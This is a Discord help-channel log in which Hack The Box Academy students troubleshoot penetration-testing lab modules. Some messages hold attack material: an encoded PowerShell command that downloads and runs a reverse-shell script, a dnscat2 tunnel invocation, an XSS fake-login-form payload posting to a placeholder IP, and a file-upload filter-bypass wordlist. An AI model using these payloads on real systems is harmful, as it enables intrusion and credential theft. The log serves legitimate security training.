#modules

and can you curl google.com?

no curl fails after trying for some time

OOOOOOOOOOOHHH ahahahaha

That makes sense

i mean, its a good password list but may not give you what you want 😉

then its a connection issue. you need to figure out if its your VM and maybe not having any adaptors passed through?

It's because I used locate / xato and used the file that ended in .txt without reading the whole thing

thanks tho!

https://academy.hackthebox.com/module/51/section/1590
Need help with privilege escalation

realistically, you should google your issue where you have a connection, something like "VM won't connect to websites" and go throguh the steps

why would u use a password list to fuzz for username?

i dont think there's a benefit for that

haha its all good mate. ive done even more silly things before. always helps to have another set of eyes for those things.

no theres not. hence why i posed it as a question to him .... which is likely the problem....

Oh lmao, all good

i mean, i could be wrong with that being the issue. but password list for users is still not ideal lol.

yeah

htb wouldnt do that i think

It definitely is the issue haha

Can confirm, just found the username

great!

Hello ! I am stuck in password attack skill assessment .

I got initial access via ssh and found credentials for hwilliam but I don’t know how to proceed

Getting Started - Knowledge check
Hi everyone, yesterday i used msf to exploit the target and it worked, but now it says that the target is not vulnerable, some help? I have spawned the target today, so its not expired

Hello Members,

Can anyone help with Value Fuzzin Topic

curl -X POST -d “id=<I have the value>” http://admin.academy.htb:30746/admin/admin.php but I am not able to get the Flag as it say "you do not have the access" what dose it means

did you manage to get the answer as it says for me that = You do not have access to it

does any once completed Android Application static analysis module?

did you manage to get an answer ? , I am stuck at the same

🙏

Network works at layer 3 (IP/ICMP) → your VM can reach external hosts by IP.
Network fails at layer 4 (TCP 80/443) → connections for web/apt/curl are blocked.
DNS works, so name resolution isn’t the problem.
Firewall inside VM is not the issue.
HTB VPN or NAT mode is likely interfering with outbound TCP connections.
Conclusion: The VM’s TCP traffic is being blocked due to network mode (NAT vs bridged) or host firewall / routing.

i still dk whats going on .. ive been stuck here for 2 days now

I am stuck at password attack skill assessment . I got initial access and found william credentials but I do not know how to proceed …

DM me please

Read the sections again carefully and you'll then come to understand what you were doing wrong.

Whenever I try to unzip SOCKS over RDP zip...
.dll is automatically deleted...any solutions....windenf is OFF

Check TARGETURI option again. It's asking for the base path to the CMS.

Where did you get stuck?

Hello all, Ive almost completed my BBH path should I wait or take the exam

Hello, may someone help me reall quick please?

https://academy.hackthebox.com/module/77/section/852

Ive been following the guide so far and have seemed to somehow gotten myself stuck. the file is uploaded, but i cant seem to get the directory pull inorder to get the information needed to continue. any clue what I did wrong?

Guys, I'm on https://academy.hackthebox.com/module/143/section/1455

Trying to solve the question as follows, but I keep getting the same error and with no outbound Internet access on ea-attack01 I'm unable to sync the time, but from what I can tell, there's no issue with the time.

||┌─[htb-student@ea-attack01]─[/opt]
└──╼ $sudo kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt

__             __               __     

/ /_____ / / _______ / /
/ //_/ _ / / __ / / / / / __/ _
/ ,< / __/ / / // / / / // / // __/
//||_// /.// _,/_/___/

Version: dev (9cfb81e) - 08/16/25 - Ronnie Flathers @ropnop

2025/08/16 09:48:54 > Using KDC(s):
2025/08/16 09:48:54 > 172.16.5.5:88

2025/08/16 09:48:54 > [+] VALID USERNAME: jjones@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: sbrown@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: tjohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: jwilson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: bdavis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: njohnson@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: asanchez@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: dlewis@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [+] VALID USERNAME: ccruz@INLANEFREIGHT.LOCAL
2025/08/16 09:48:54 > [!] mmorgan@INLANEFREIGHT.LOCAL - KRB Error: (11) KDC_ERR_NEVER_VALID Requested starttime is later than end time
||

I’m doing the aen module and ||I noticed an AD group doesn’t display as vulnerable in bloodhound||, but in the walkthrough it does display as vulnerable. I’ve tried installing the newest bloodhound software (which I thought was via docker) and it’s still not displaying. Am I doing something wrong ?

Solved my own problem lol

I've tried syncing the time with the DC using ntpdate, but ntpdate is not available on the machine 🤷‍♂️
||sudo ntpdate -s 172.16.5.5||

https://academy.hackthebox.com/module/77/section/852

back again, my ncat isnt loading, just says listening on any

Cheers - no rdate, but I'll try a change in the VPN 👍

No, vmware. Kali, with Windows as the base machine

can someone help me understand something in the way live targets works ?
I've put the vpn but when i visit the link its the default apache page,
and for the vhost i don't understand i just have the name

Hallo!

Absolute star ⭐ - It was something to do with the VPN region. Thanks for the advice! 💪

Tag! I believe it's English only on the server 😁

Well i guess the target ip should be a vulnerable web app, but i get the default page, and in the module they talk about vhost like exploitserver.htb where we put our payload but i just have the name not the ip

I am English, I just use hallo for funsies

FFS - I almost brought my German out on you

HAHAH-

Naw

Advanced XSS and CSRF Exploitation - the lab warmup 😢

So, im sitting with the file directory open, however the ncat doesn't seem to be working

well thats what i don't understand the other web module i tried was more simple, it just had an ip with the vulnerable app,
i don't understand what do i have to do to connect to the vulnerable website and send the payload

im sorry its maybe a stupid question but i really don't understand how the setup works

but i don't have any ip for them

hooo i self host ?

yes

@unkempt ore - I think you would benefit from reading a bit about the basics of vhosts. Then your understanding of them and how to interact with them will become simpler for you.

To add @unkempt ore - https://academy.hackthebox.com/module/144/section/1257

I agree i just used vhost once for selfhosting with a custom name but didn't searched more on what it does

can i dm ?

Okay my bad i had two devices on the vpn that why i guess it wasn't working, Thanks All

moderator is staff btw, just wanted to let you know if youre not staff dont pretend to be. you can confuse people especially if you only text in vague two word sentences.

The moderators are usually not employees. Employees also have the role HTB Staff.

They literally help people in here all day for free and you’re mad at them 😂

i have doubt in this module that whether i need to connect a android device or use emulator

Connect all home network

It will be fun

I have a trouble I`m doing password attack module and I have a last question: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. I got user and password but smb shares only have one privilege READ ONLY in IPC$ share

I got username and password using netexec smb module. And active shares. But then when I checked them with SMBMAP I found that all shares except IPC$(READ ONLY) have denied access. So I cant get a flag: Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.

is the only different the name? Or in other words, the module is still completely relevant if the cme is substituted for nxc?

I completed the module using nxc only. Had no issues at all.

thank you!

really need help with that, here is the link https://academy.hackthebox.com/module/147/section/1327

Attacking Thick Client Applications
https://academy.hackthebox.com/module/113/section/2139
i modify 554.bat file and run it and just create 2 file in c:\programdata but HTB say it will create 3 files .

-a----        3/24/2023   1:01 PM            273 monta.ps1
-a----        3/24/2023   1:01 PM         601066 oracle.txt
-a----        3/24/2023   1:17 PM         432273 restart-service.exe```
but i see in screenshort one file `restart-service.exe` is missing . what to do ?

There have been some updates to the options for some of the modules and protocols, but it's definitely not a show stopper.

SMB 10.129.202.136 445 WINSRV [+] WINSRV
SMB 10.129.202.136 445 WINSRV [*] Enumerated shares
SMB 10.129.202.136 445 WINSRV Share Permissions Remark
SMB 10.129.202.136 445 WINSRV ----- ----------- ------
SMB 10.129.202.136 445 WINSRV ADMIN$ Remote Admin
SMB 10.129.202.136 445 WINSRV C$ Default share
SMB 10.129.202.136 445 WINSRV CASSIE
SMB 10.129.202.136 445 WINSRV IPC$ READ Remote IPC

*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.129.202.136:445    Name: 10.129.202.136          Status: Authenticated
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    CASSIE                                                NO ACCESS    
    IPC$                                                  READ ONLY    Remote IPC

Used credentials that HTB gives in the module

Hey guys, does anybody know of some boxes that I could use as practice for Pass the Ticket attacks on both Windows AND Linux domain joined systems?

Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.

For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache

At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)

But I get this error below. I tried alot to solve this issue but still the eroor is here.

Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41

• ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]

•                           ~~~~~~~~~~~
  

  • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
  • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session

Sorry Im new to htb discord. I'm not sure if its the right place to ask questions.
Thankyou!

The error has fullyqualified in it which leads me to believe it may be related to not putting inlanefreight.local in your hosts file

should I put inlanefreight.local against the generated ip for the module?

One more thing:
PS C:\Users\htb-student\Desktop> nslookup inlanefreight.local 10.10.14.216

Server:  UnKnown
Address:  10.10.14.216

DNS request timed out.
    timeout was 2 seconds.
DNS request timed out.
    timeout was 2 seconds.
*** Request to UnKnown timed-out

yeah just use the target IP

Try using credentials that you have identified while answering previous questions.

thx, solved already netexec stopped when find matching user and password but it have 3 matches

You can add this next time you are doing something similar --continue-on-success

yeah I found out it while researching, thx

hosts:
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.42.198 inlanefreight.local

but still the same error.

You're doing nslookup from the target not your own machine

yes its the target machine

ok so do you still get the error on your kali box

In this command you're trying to lookup inlanefreight.local using your kali box as the nameserver. that's not how it works, your kali box isn't running a nameserver. your hosts file simply tells your kali box which hostname should be resolved with the ip you put in there.

Clarification:
my Attack host ip: 10.10.14.216
Target ip given: 10.129.42.198

1. I tried to run nslookup from the target to my attack host.
2. I edited my host file on my attack host as you said.

Yeah that's not going to work due to the reason I stated above, your kali machine isn't running a nameserver/dns server.

the original error you posted was due to running ruby dnscat2.rb on your kali box. to rectify that error you should first try adding the spawned ip into your hosts file with inlanefreight.local

then try running the ruby command again to see if the error still happens

I added inlanefreight.local to my host file (on Attack host kali linux)
but still the error is there.

I tried changing servers as well.

oh i'm sorry i misread your first post, i see you posted results from both boxes i thought it was only the kali box

No worries. So what should I do?

are you running powershell as admin?

yes

1. I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
2. UDP connection is working as well.
   exhausted chatgpt gemini as well to sort out the error. This is last resort.

Hi

i am not sure i would probably need to see the full setup, your commands seem fine

Please I need help

@dense pagoda This server isn't for that.

Where can I find a server for that please

How t f would we know

we don't do illegal crap

Okay

Sorry

if i want practice material, is academy a good alternative to retired boxes?

So far thankyou very much. Please let me know what you need to analyze further this problem.

Academy is the learning platform, it teaches you how to attack and gives challenges at the end of each section. I wouldn't really say it's for practice, more for coming up with a good playbook and learning things. Boxes/Fortresses/Challenges/Prolabs/etc are for practicing

Unfortunately I can't help right now sorry maybe someone else can help in DM or something

ok i need a good playbook and to learn

Then yes you want Academy

are you able to recommend where i should start in academy (any must-have modules?), or should i just pick what interests me?

I would say follow the path for the topic that interests you most. Internal/external pentesting = CPTS path. Web pentesting = CBBH path (CWEE is the advanced web pentesting path). Defensive/blue team stuff = SOC Analyst path, etc.

you recommend against picking individual modules?

You can, but some of them rely on knowledge from previous modules in the path

Hello all, I need some advice I've almost completed my BBH path, would you recommend me to take the exam, or after the update.

Is it just me, or does anyone else find that the output flag -o <filename.txt> doesn't work with userenum? The command runs through, but the output file is empty. 🤷‍♂️

Maybe try this channel? https://discord.com/channels/473760315293696010/958071178713514045

I just finished Firewall evasion easy https://academy.hackthebox.com/module/19/section/117

Anyone have a minute to talk about the hint? I was unable to tell if a certain part of it was helpful or not though i ultimately didnt make use of it and curious if i missed out on the benefit of something

prob best for DMs so I dont spoil

Hi 🙂

Anyone up to discuss firewall hard skill assessment? im on the right track, sorta but im having probs https://academy.hackthebox.com/module/19/section/119

hi i need help, im doing the "Linux Fundamentals" and im at "System Information", the problem im having is connectiong using ssh, i spawn a target, i type everything correct "ssh hbt-student@10.129.246.44" but when i press enter, nothing happens, its just blank, then after ~2min i get this ssh: connect to host 10.129.227.96 port 22: Connection timed out. Help please! i aint trying to get stuck here.

Any moderators on who can help?

Been experiencing the same problem over here too.

In Password Attacks Pass the Ticket (PtT) from Linux:
I'm getting this error for this command:

smbclient //dc01/julio -k -c 'get julio.txt' -no-pass

Error:

gensec_spnego_client_negTokenInit_step: Could not find a suitable mechtype in NEG_TOKEN_INIT
session setup failed: NT_STATUS_INVALID_PARAMETER

I successfuly ran the cp and export command in this module prior to this.

man im just trying to lurn over here haha, do you have the instance on?

@sharp cove can you help us?

Got to extend with another hour to keep the Pwnbox lifecycle long enough.

can i PM you how it looks on my side?

Hi Guys.
What do you know about instagram security?
is it a profession?

Yes you can

just sent you a PNG

With what? Im afk right now

i can't connect using ssh

this @sharp cove

@cloud urchin are you there?

Please do not randomly ping people. Just ask your question here and if someone is can and willing to help they will.

Are you willing to help?

i am busy, but your error is network related. make sure you're on the vpn and not using the pwnbox at the same time.

Anyone into CTF here?

Not the right channel for that. Please follow the instructions in #welcome to gain access to other channels.

Are yu ai

nope. @compact patrol is a bot though

Hi everyone, can someone explain how does the Nmap host discovery works? Particulary about the type of packet sent

that will depend on the options you use in your nmap command

https://nmap.org/book/man-host-discovery.html

I am reading the documentation and this is what is says about the -sn option: "The default host discovery done with -sn consists of an ICMP echo request, TCP SYN to port 443, TCP ACK to port 80, and an ICMP timestamp request by default". If the -sn option disables the port scanning, why nmap perform a port scanning?

Are you still working on this?

-sn will only send packets to TCP/80 and TCP/443. by default, Nmap scans the top 1000 common ports. -sn doesn't do that. that's what it means by no port scan

why it sends a packet to 80 and 443, i'm not really sure

so with -sn the only ports that get scanned are 80 and 443?

from the way the documentation is written, it doesn't sound like those ports are even being scanned. Nmap just sends a packet to them

but maybe that's not true. if you run the command, if it doesn't specifically show 80 and 443 in the results, then it's not scanning those ports

Anyone got a sec for the nmap firewall hard lab? I feel like i should be getting a flag (finally) but im... not?

maybe i need to restart box. let me try that real quick now that i have my lil approach

Do you advise to read all the nmap documentation?

you don't have to read all of it, but you should have a basic understanding of what the tool is doing

Yes

I will help me. YOu may DM me for help. Start with what you are running and the output you are getting.

Hello

Dang i was going to try and help but I don't think i did that section. Looks like they have updated a few sections on that module since i did it. Sorry brother

No problem!

thanks!

cd ~

solved this issue

Hey! by any chance, is there any one who had already finished the updated Password Attacks SkillAssessment?
I finished it when there were 3 parts but now it's updated and I can't see a way to go further after accessing through ssh. Module says there are 4 internal hosts (172.16.119.X) but only 2 are reachable.

In Password Attacks Pass the Certificate:
When trying to run:

python3 gettgtpkinit.py -cert-pfx ../pywhisker/pywhisker/1UCYb0YS.pfx -pfx-pass '1P9EvC2tKKJlBSum4Ej4' -dc-ip targetIP INLANEFREIGHT.LOCAL/jpinkman /tmp/jpinkman.ccache

I get this error:

2025-08-16 20:43:06,994 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
Traceback (most recent call last):
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 302, in amain
    ini = myPKINIT.from_pfx(args.cert_pfx, args.pfx_pass, dhparams)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/htb-ac-874050/PKINITtools/gettgtpkinit.py", line 47, in from_pfx
    with open(pfxfile, 'rb') as f:
         ^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory: '../pywhisker/pywhisker/1UCYb0YS.pfx'

its saying that the .pfx files doesnt exist. thats your error

You have this 1UCYb0YS.pfx?

if you need to, find the absolute filepath to the file, and use that

oh ok

@alpine mural Please take care not to post content from modules above tier 0

OK.

i wouldnt include the password for the user in that lol

There is no need to post details at all. Anyone who has done the module and can help knows the details. Just state the module/section/question you're on, maybe post the error itself, or obfuscate things. Best to take it to DMs if you feel like you need to reveal a little more.

aaa...ok.

I got this error in Pass the certificate in passwords attacks.I cant get the .pfx . I dont undestand the reason.

its part of the terms of service that you don't share information for modules above tier0. they dont want ppl searching through chats to find the answer to things instead of figuring it out. you can ask for help obviously, just don't give away key bits of information (especially since others will wont to do modules in the future, and what is seen can't be unseen ...)

Yes,yes...my error, sorry.

If the lasts picture are wrong, let me know and DM to you

ah, so i think the issue is OpenSSL.CRYPTO as its a known issue. if i remember correctly, you have to patch that specific pkinittools

@alpine mural https://github.com/fortra/impacket/issues/1716#issuecomment-2118145295

i know someone who setup a pyenv just for this fix/patch so he didn't have to patch and unpatch the issue moving forward.

Oh...thank you very much for that link.

let me know if that solves the problem

Yes!! Works now!

Thanks!

I have the .pfx

you may need to undo that patch for future work, so just keep that in mind

Yes. I create a env , and i put in my notes the link and the step by step to do.

great work

-sn in Nmap means "ping scan only" (no port scanning).

That means Nmap will only check if the host is alive (host discovery), not enumerate open ports.

When Nmap tries to decide if a host is up, it doesn’t just send ICMP Echo (ping). Many networks block ICMP. So, by default, it also sends:

ICMP Echo request

TCP SYN to port 443 (HTTPS)

TCP ACK to port 80 (HTTP)

ICMP timestamp request

These are not port scans in the sense of “check all ports systematically”. They are simply probes to elicit any response from the host. If the host replies, Nmap marks it as "up". If not, it may mark it as down (unless you disable host discovery with -Pn).

Yes, you need to install the app on the device for analysis.
I personally use Android Studio, but you can go with whichever option is easiest for you.

if you still need help with this, feel free to DM me

Did you get answer for your question?

can anyone help me with nibbles

im not about to get a reverse connection

anyone?

What have you tried so far?

ive save my php file and tried to get a reverse response when i curl it but i got no resopnse

show with screenshots what you're doing, it's a tier0 module so no problem spoiling it

wait a moment

can you specife what should it send

your process of getting the reverse shell

can i share my screen

?

Hello, I'm struggling with XSS assessment.
I can't even get a callback to my web server in any input field, with all the payloads from the module (and much more). I tested variants of the payload I got success with for session hijacking exercise.
Moreover, when shuting down the machine and starting a fresh one, I do not get the same results each spawn. Sometime I see my comment appear, with a "waiting for moderation" note, sometime I do not see my comments. On spawns where I see my comments, I suspect there is some kind of filter on < character, completely eluding my payloads, as I get errors duplicate messages for such cases.
I saw in some messages that the payload should be simple, but it does not look like working for me.
Are you still able to perform XSS on the website ? Any tips otherwise ?
Thank you

Which modules cover CSRF?

For beginner*

type csrf in academy search

use search feature..it will show all the modules regarding that

Ty

Cheers 🙂 Is sqlplus supposed to be pre-installed on pwnbox? I came across two instances in the CJCA-path which read like sqlplus should already be installed 😄

If its the Advanced CSRF and XSS module you can dm me

Unfortunately it's the classic XSS one

Did you check for cors errors?

I got no call to my server at all, running a web server with python http.server, which works fine in a previous section of the module

bump

And there are no other errors in the console ?

Can anyone help me with dnscat2? I am getting error while connecting from client to server. Thankyou!

My post returns 302 when sending my payload, and I can't see the console for the injection afterwards as it's blind XSS for the admin of the website

Try the payload on yourself first if you can, maybe theres some js error or cors. To bypass corse you can use window.location

On spawns where I can see my comments, I tried, but can't achieve to bypass the fiters. However, the fact that the behavior is not idempotent accross machines makes my think there is something wrong with the machine.

Working on "DNS Tunneling with Dnscat2" for CPTS but I am stuck because of an error here.

For server:
sudo ruby dnscat2.rb --dns host=10.10.14.216,port=53,domain=inlanefreight.local --no-cache

At client side:
Start-Dnscat2 -DNSserver 10.10.14.216 -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd
(yes i am copying and verifying same secret at both sides)

But I get this error below. I tried alot to solve this issue but still the eroor is here.

Update-Dnscat2Session : Dnscat2: Failed to ConvertTo-Dnscat2Packet...
At C:\Users\htb-student\Desktop\dnscat2.ps1:2098 char:41

• ... $Sessions[$SessionId] = Update-Dnscat2Session $Sessions[$SessionId]

•                           ~~~
  

  • CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
  • FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Update-Dnscat2Session

Not familiar with dnscat nor windows, but this exception makes me think of a permission error. Maybe trying with elevated network privileges ? 🤷

I am local host on windows machine (which is part of lab). Running powershell as an admin.

For Reference: https://academy.hackthebox.com/module/158/section/1436#questionsDiv

Hii anyone help me

For some details

@void matrix Not that kind of server. This server is for discussion about HTB.

Anyone care to help me a little bit? I'm stuck on the "Windows Lateral Movement" module, Section "Windows Remote Management" and Question #3 with getting the flag on DC01 as Leonvqz.

I can forge the user's ticket but can't "Enter-PSSession" been stuck for quite some time now..

I've tried everything I can think of and nothing seems to work. I'd highly appreciate if someone could just give me small nudge

you can DM me

Do you get the error on the server or the client? Can you use a higher port number above 1024? Maybe the firewall is blocking writes on that port

the error is on client side.

When I initiate connection from client side, the server gives me prompt where it says connection established, at the same time the client side (which is windows part of lab) gives this error.
I think client-server are struggling to maintain the connection.

I tried sudo iptables -A INPUT -p udp --dport 53 -j ACCEPT
UDP connection is working as well.
exhausted chatgpt gemini as well to sort out the error.

Well actually made it work, I'm pretty sure I already tried the payload that worked there in the past without success, looks like it's not so reliable 🤷 Thank you anyway!

anyone can help with the payload crafting

document.createElement('form');f.action='http://OUR_IP';f.method='POST';var u=document.createElement('input');u.type='text';u.name='username';u.placeholder='Username';f.appendChild(u);var p=document.createElement('input');p.type='password';p.name='password'

If somebody manages it and tells me Ty

That's not what this server is for.

Ok

Guys, I am stuck with the XXS I have the payload which is working perfect but when I am trying to send it via SEND ME A URL its says invalid url

#1024429874246590575

Leave it I have solved this one !!! 🙂

Module Intro to C2 Operations with Sliver

How Would I execute this command against an sliver listner

execute-assembly /mnt/hgfs/HTB/www/GodPotato-NET4.exe -cmd "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA1AC4AMgA5AC8ASQBuAHYAbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAFIAdQBuAC4AcABzADEAIgApAAoA"

⚠   Injected .NET assembly arguments are limited to 256 characters when using the default fork/exec model.
Consider using the --in-process flag to execute the .NET assembly in-process and work around this limitation.

hi im in Advanced SQL Injections module and i think there is problem with instance

error: port 8080 already in use

how deep are you in the scenario? can you restart the box perhaps its soggy?

if its not too much of a hassle i woudl restart the target and then try to laucnh the application again and see ifyou get the same error.

until someone who's done the module before can give some better help

i did and same problem

i cant be of MUCH more help here but i would try

sudo lsof -i :8080

and see if you can identify whats running on the port.

if that is no help try nmap on 8080 with an -sV

or perhaps giving it a port other than 8080 to run on? (if like something ELSE thats NOT your sql server is running on 8080 and needs to be)

if the sql server is running on 8080 maybe try kill or pkill or whatever then retry

hello, someone can help me in whitelist filters on file upload attacks module

yea, i know where the files are uploaded

but i not found my shell

y probe shell.php, shell.jpg, shell.php.jpg

etc etc

y use php list with the intruder, and i have liker 3 succesfully uploads

the others give the error " only image allowed " or " extension not allowed"

i use this
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
for ext in '.php' '.phps'; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done

and i use it with the intruder

okay, but i already have 3 with succefully uploads

i use it too

okay

wait , i send again the intruder with the other list

and 2 more

i delete it after

its only to show how im doing the thinks

whats PM? im not english, i dont know all the abbreviation

dm?

Private Message

the original DM

okay okay, i was reading pm and i dont know jhajsajsa

that make sens

new word learned

i did this module a year ago but dont remeber it

but i do remember that being a headache

i think awoken is high lmao

😂

bro cracked every possible word could be generated

hahah

@cunning canopy which exam you are preparing for?

anyone can help with
using crackmapexec module
skills assessment
stuck on the second question, already got the s*** user, and I cannot go further from in there

its illegat

we dont promote any illegegal activies here

Yeah i know but is this possible?

• 2nd..you are in wrong channel

only modules related chat here

#general for off topic chats

Okay 🫡

I was just asking

Hello everyone
Can anyone suggest me ...how to take note the modules in HTB academy and Linux app...!!?

there are a lot of video on youtube

Hey guys in the Password attacks module , the section Pass the hash https://academy.hackthebox.com/module/147/section/1638

I already solved the question with mimikatz.exe, but I wanted to know is it possible to use netexec to achieve all the NTLM hashes using a local administrator hash?

I thought of dumping the lsa secrets, but it only got me the plain text password, and when I tried to dump the SAM database it didnt show any NTLM hashes for the user David

Thanks in advance

Give me the link

Dm me

Hey, if anyone is currently working on CPTS, please reach out to me!! I'm on web proxies and moving forward from there!!

https://www.brunorochamoura.com/posts/field-manual/

Should test authentication using relevant protocol and then go from there.

If you still need help DM me

Oh I didn’t see Ricky responded

yes, I have found it, the DB, but its empty

Think how you can check to see if you can get different privileges. There's a module you can use.

Hi, has anyone completed LLM Output Attacks module from AI red teamer path?
I managed to get the admin key and the hashed admin password. I am trying to use the admin bot but have not been able to know where the flag is. https://academy.hackthebox.com/module/307/section/3597

https://academy.hackthebox.com/module/77/section/852

For this, where do I find the listening port i need to use for the PHP code

do I need to nmap??

could be any port on your system for callback that's not already in use.

Oh okay

The example uses port 9443 so ig ill use thay

CAN SOME ONE PLEASE SHARE THE FLAG OF https://academy.hackthebox.com/module/113/section/2164

its so frustating....

Anyone gotta sec to soundboard for the DNS section https://academy.hackthebox.com/module/112/section/1069

im headed in the right direction and now what i need to do, just having some problems picking the right direction to focus on due to the time sink involved with 4-5 options

If you’re still stuck, you can dm me (just you)

Thank you for offering to assist! I finally managed to solve it

Still looking for a lil direction on the DNS AXFR module https://academy.hackthebox.com/module/112/section/1069

Great job

@quiet trout can dm me

What happens when you finish all Hack The Box modules? Because you have nothing to keep your streak going on. But if I finish all the modules, how can I continue my streak?

Anyone available for some help on HTTP Attacks the TE.CL request smuggling?

This isn’t a hacker for hire server though

If it’s illegal, this isn’t the place for it

Cyber line
Am lost i need help

Don’t ask to ask, if you need help with a module, name the module and section 🙂

anyone else's Pwnbox terminate while they were practicing linux commands in the linux fundamentals module?

How come I do
inline-execute-assembly /home/kali/Tools/CustomCollection/SpoolSample.exe 'dc01 srv01'
But my rubeus monitor only catchs the srv01 tgt which is the one im monitoring from trying to get the dc01 tgt...

What module is this for?

sliver module section = kerberos

could it be because the TGT for the DC01 is already cached ? so the delegation does not occur after checking if the TGT is already there ?

Haven’t done this module, sorry 🙂 but I’m sure someone else has

hey guys can you help me out here

Bro I skip those

U learn the name then what happens

like is that a glitch or something

Are u gonna be mega hax0r

U can tell me the module and exact section and ill give u a hint

no i have actually started today so i just want to learn

Good job

hello

Components of a Network

What?

i am stuck in these questions

hi

wdym your stuck? you literraly have the correct answers typed in, just submit

its showing wrong thats why i am asking

it accepted the below answers "fire wall"

have you tried IP?

can someone explain why i keep getting this error in the pass the certificate section from the password attacks module

yes

try IP and Network Management Software

well then I have no idea 🌚

IP did not work but other one worked

thanks

TCP/IP

@fair charm

"OMG IT WORKED WITH CAPITALS " lol i did not know it htb answers are case sensitive

it shouldn't be 🙂

hoo i dont know i am new to htb and every thing

guys I just got a message saying GG on leveling up! You can type /rank to see your rank card in HackTheBox. 😉
what does that mean?

np

what is this

/rank

no idea, I am asking

/rank

yep nothing happened

holly shit what is slow mode?

so I can't make more than one message in 5 seconds?

sync your clock

hoo okay can we be friends i just sent you request

I accepted right away

really thanks mate 🙂

danke

For Credential Hunting in Network Traffic they have you download a pcapng file to analyze but I don't have a VM to check this, I just connect to the workspace. How do I transfer it over?

So I tried and tried to solve this question but nothing worked, and ChatGPT was no good either, everything it suggested failed. Anyone has an idea how can I solve this question?

how do I attach an image here?

hello, need helps in skills on file upload module

• button on left

use printscreen and paste it simply with CTRL+V

already 🫡

Verifying your account will give you image permissions here

that gives me USE APPS only

#welcome has all the required info to do so

I'm not on windows

why could that be

did you connect to htb account with discord ?

👋

need to verify

#welcome holds all the info

yeah I was going one message at a time😅

thx guys

ha yes he need to add his htb discord id here ig

ah that's right

Anyone got a sec for POP/IMAP https://academy.hackthebox.com/module/112/section/1073

I am able to see my inbox(es or lack thereof) but dont see any emails.

hey i have doubt so are you guys active all the time like moderators or you guys take shifts ?

No shifts, we’re all volunteers 🙂

so you stay all time online ?

i thin khe means they volunteer on their own time

as possible

Let’s move to #general

hoo okay

I tried random answers until I got it right

but I want to know how is it really solved?

I know I should start with curl then grep then sort then wc
the problem is with using grep, it returnes the entire line and not only the link, that way I can't use sort correctly

i dont understand your question

any suggestions?

you already connect ?

yes im connected and logged into both pop3s and imaps with openssl and i've listed my inboxes but i have no emails

i have no spam/trash or anything

LIST “”*
with this command you dont recieve any input?

I do i receive an inbox with no email

can you send me what u recieve, im looking my notes and i have 2 folders

what could be the issue here ?

@still flint no need to post a dot as a message twice

Please read #welcome and #rules it will explain how to get verified

Sorry I read rules but it says read modules

No worries, this channel is to discuss Academy modules. If you want to chat in #general please read and follow instructions of #welcome

It’s three simple steps

nvm

i figured it out

any ideas?

@weak vapor Please take care not to post answers from modules

shit, I forgot that!

I need help with this question

maybe you should enumerate the paths using gobuster

need help with these two questions in Footprinting Module DNS Section

I don't think so, the question says using curl

besides, gobuster needs wordlists

If you have the source code you can maybe check the endpoints manually

how much manually do you mean? I won't read the whole think and count

I tried grep but it keeps being the wrong answer, so I'm guessing I'm using it wrong

What module is that ?

linux fundamentals

filter contents page

task 3
